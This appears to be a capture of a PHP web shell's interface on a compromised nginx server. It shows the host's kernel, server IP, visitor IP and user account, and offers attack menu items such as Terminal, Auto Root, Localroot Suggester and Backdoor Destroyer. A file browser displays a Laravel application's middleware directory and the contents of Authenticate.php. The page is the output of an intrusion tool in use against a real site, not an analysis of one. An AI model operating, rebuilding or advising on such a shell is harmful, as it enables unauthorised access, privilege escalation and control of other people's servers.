Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.133.142.101
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
app /
Http /
Middleware /
Delete
Unzip
Name
Size
Permission
Date
Action
Authenticate.php
469
B
-rw-r--r--
2020-11-17 16:24
CheckForMaintenanceMode.php
335
B
-rw-r--r--
2020-11-17 16:24
EncryptCookies.php
294
B
-rw-r--r--
2020-11-17 16:24
RedirectIfAuthenticated.php
582
B
-rw-r--r--
2020-11-17 16:24
TrimStrings.php
340
B
-rw-r--r--
2020-11-17 16:24
TrustHosts.php
354
B
-rw-r--r--
2020-11-17 16:24
TrustProxies.php
441
B
-rw-r--r--
2020-11-17 16:24
VerifyCsrfToken.php
307
B
-rw-r--r--
2020-11-17 16:24
Save
Rename
<?php namespace App\Http\Middleware; use Illuminate\Auth\Middleware\Authenticate as Middleware; class Authenticate extends Middleware { /** * Get the path the user should be redirected to when they are not authenticated. * * @param \Illuminate\Http\Request $request * @return string|null */ protected function redirectTo($request) { if (! $request->expectsJson()) { return route('login'); } } }